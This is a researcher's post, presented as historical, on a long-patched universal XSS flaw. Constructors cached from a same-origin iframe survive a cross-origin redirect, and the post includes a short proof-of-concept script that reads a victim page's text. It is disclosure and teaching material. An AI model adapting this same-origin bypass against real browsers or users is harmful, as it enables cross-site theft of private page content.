UXSS: Cached Constructor Object Survives Cross-Origin Redirect

A variant of the cached-collection UXSS: caching a reference to a constructor function (Image, Option, XMLHttpRequest) from a same-origin IFrame, then redirecting the IFrame cross-origin, left a constructor that instantiated objects belonging to the new document. Calling the constructor after the redirect returned an element whose ownerDocument was the cross-origin document.

// Cache the constructor while on the same origin
var xImage = window[0].Image;

// Redirect the IFrame to another origin
window[0].location = "http://www.victim.com/";

// After redirect, instantiate via the cached constructor
setTimeout(function() {
    alert(xImage().ownerDocument.body.innerText); // Cross-origin read!
}, 2000);

The same technique worked with Option and XMLHttpRequest. The constructor functions held a reference to their parent document that was not updated when the IFrame navigated. Calling them after a cross-origin navigation produced objects that pointed into the new document’s memory, bypassing same-origin checks.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS: InsertImage and CreateLink execCommand Bypass Same-Origin Policy] :: [IE9 Crash: A Lone SVG Tag] >